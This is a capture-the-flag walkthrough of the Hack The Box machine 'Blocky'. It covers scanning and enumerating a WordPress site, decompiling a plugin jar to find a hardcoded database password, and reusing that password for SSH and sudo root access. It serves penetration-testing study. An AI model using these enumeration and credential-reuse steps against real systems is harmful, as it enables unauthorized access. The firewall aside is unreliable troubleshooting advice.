Blocky HTB Walkthrough

This machine is oscp similar machine and oswe prep machine.

Overview :Open TCP ports: FTP (21), SSH (22) ,HTTP (80),minecraft(25565); Apache httpd 2.4.18;WordPress 4.8;Ubuntu 4ubuntu2.2 (Linux).

Add blocky on the /etc/hosts file

Recon

port scan -nmap

// nmap -T4 -A -p- 10.10.10.37

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04 Xenial. There’s also something interesting going on with TCP 25565, as it’s reporting closed.

Apache link:https://packages.ubuntu.com/search?keywords=apache2

OpenSSH link:https://packages.ubuntu.com/search?keywords=openssh-server

Nikto Scan

// nikto -host 10.10.10.37

Website - TCP 80

Visit web page 10.10.10.37:80

I find this web is WordPress as "proudly powered by WordPress" and it has wiki system as the server. I check this post and found the user account name notch and login page.

The default login admin:admin does not work.

WepScan

There are no plugins found. It does identify the notch user I noted earlier on the site.

┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# wpscan --url http://10.10.10.37 -e ap,t,tt,u 
 130 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |) | (_ ___ __ _ _ __ ®
\ \/ \/ / | ***/ *** \ / __|/ ` | ' \
\ /\ / | | _) | (| (| | | | |
\/ \/ || |*****/ |,|| |*|
WordPress Security Scanner by the WPScan Team
Version 3.8.19
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Sun Nov 21 03:10:43 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:32
<=============================================================================
=========> (400 / 400) 100.00% Time: 00:02:32
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's
simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8'
[+] twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3'
[+] twentysixteen
| Location: http://10.10.10.37/wp-content/themes/twentysixteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the
horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:04:42
<=============================================================================
=======> (2575 / 2575) 100.00% Time: 00:04:42
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01
<=============================================================================
===========> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 03:18:20 2021
[+] Requests Done: 3050
[+] Cached Requests: 19
[+] Data Sent: 825.099 KB
[+] Data Received: 18.245 MB
[+] Memory used: 264.414 MB
[+] Elapsed time: 00:07:37

Directory Brute Force (Run Gobuster and include PHP)

┌──(root💀kali)-[~/Desktop/htb/blocky]

└─# gobuster dir -u blocky.htb -w /usr/share/wordlists/dirb/common.txt -x php -t 40                                                                               1 ⨯

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://blocky.htb

[+] Method:                  GET

[+] Threads:                 40

[+] Wordlist:                /usr/share/wordlists/dirb/common.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              php

[+] Timeout:                 10s

===============================================================

2021/11/21 03:05:20 Starting gobuster in directory enumeration mode

===============================================================

/.htaccess            (Status: 403) [Size: 294]

/.htaccess.php        (Status: 403) [Size: 298]

/.hta                 (Status: 403) [Size: 289]

/.htpasswd            (Status: 403) [Size: 294]

/.htpasswd.php        (Status: 403) [Size: 298]

/.hta.php             (Status: 403) [Size: 293]

/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]

/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]

/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]

/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]

/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]

/server-status        (Status: 403) [Size: 298]

/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]

/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]

/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]

/wp-login.php         (Status: 200) [Size: 2402]

/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]

/wp-blog-header.php   (Status: 200) [Size: 0]

/wp-config.php        (Status: 200) [Size: 0]

/wp-cron.php          (Status: 200) [Size: 0]

/wp-load.php          (Status: 200) [Size: 0]

/wp-links-opml.php    (Status: 200) [Size: 219]

/wp-trackback.php     (Status: 200) [Size: 135]

/wp-mail.php          (Status: 403) [Size: 3444]

/wp-settings.php      (Status: 500) [Size: 0]

/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]

/xmlrpc.php           (Status: 405) [Size: 42]

/xmlrpc.php           (Status: 405) [Size: 42]

===============================================================

2021/11/21 03:06:30 Finished

===============================================================

From that list, I’ll check out /wiki, /plugins, and /phpmyadmin

visit 10.10.10.37:80/wiki

visit 10.10.10.37:80/phpmyadmin

I find default login admin:admin does not work.

visit 10.10.10.37:80/plugins

I find two .jar files (BlockyCore.jar and griefprevention-1.11.2- 3.1.1.298.jar) and download in my host machine.

A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension.

Shell as notch

Reverse Jars

I use JD-Gui to be decompile the java files.JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields.

jd-gui:

How to install: sudo apt install jd-gui,

more details link :https://www.kali.org/tools/jd-gui/ Install jd-gu

After installation, I launch the jd-gui with the command"jd-gui". Then I choose to check each jar file. I found the root login details in blockycore.class.

public class BlockyCore {
** public String sqlHost = "localhost";**
** public String sqlUser = "root";**
** public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";**

I try to login phpmyadmin account with root:8YsqfCTnvxAUeduzjNSXe22, and login successfully.

I check wp_users and found the user notch information as followed.

SELECT * FROM `wp_users`

I choose "hash-identifier" to identify the possible hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/". Hash-identifier is a software to identify the different types of hashes used to encrypt data and especially passwords.Find more information link: https://www.kali.org/tools/hash-identifier/

How to install: 

 apt install hash-identifier

I launch hash-identifier with the following command

hash-identifier

I know the hash is most likely to be an MD5 (WordPress) hash.

Exploitation(SSH -Port 22 )

I use SSH to login root or notch account.

The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).

More details : https://www.ssh.com/ssh/protocol/

I find two user accounts (notch and root) and a password 8YsqfCTnvxAUeduzjNSXe22. I use ssh to login account notch with the command.

sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37 
or 
ssh notch@10.10.10.37

User Notch

I login notch with ssh but I get the error information "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find the resolve information link:https://www.tecmint.com/fix-no-route-to-host-ssh-error-in-linux/

 firewall-cmd --permanent --add-port=22/tcp
firewall-cmd --reload
OR
sudo ufw allow 22/tcp
sudo ufw reload

I choose to use ufw and then got another error information "zsh: command not found: ufw". I have to install the ufw tool and find the ufw installation information "apt install -y ufw". The details link is https://www.hiroom2.com/2017/07/20/kalilinux-2017-1-ufw-en

Login with tool SSHPASS

sshpass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password is indeed issued by an interactive keyboard user. Sshpass runs ssh in a dedicated tty, fooling it into thinking it is getting the password from an interactive user. More information link:

https://www.cyberciti.biz/faq/noninteractive-shell-script-ssh-password-provider/

how to install sshpass in kali:

apt-get install sshpass

Privilege Escalation

Notch --->Root

I use the command "sudo -l" and "sudo su -" to get root access. The root password is the same as notch.

Sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser.

More information link:https://en.wikipedia.org/wiki/Sudo

I can see that Notch has unlimited privileges and can run any command on the system.Then I root it with "sudo su -".

Thanks for reading . This is my 41th pwned machines in Hack the box. I will try harder to be beyond OSCP. Then I can pass OSCP successfully.

PreviousHTBNextReferences

Last updated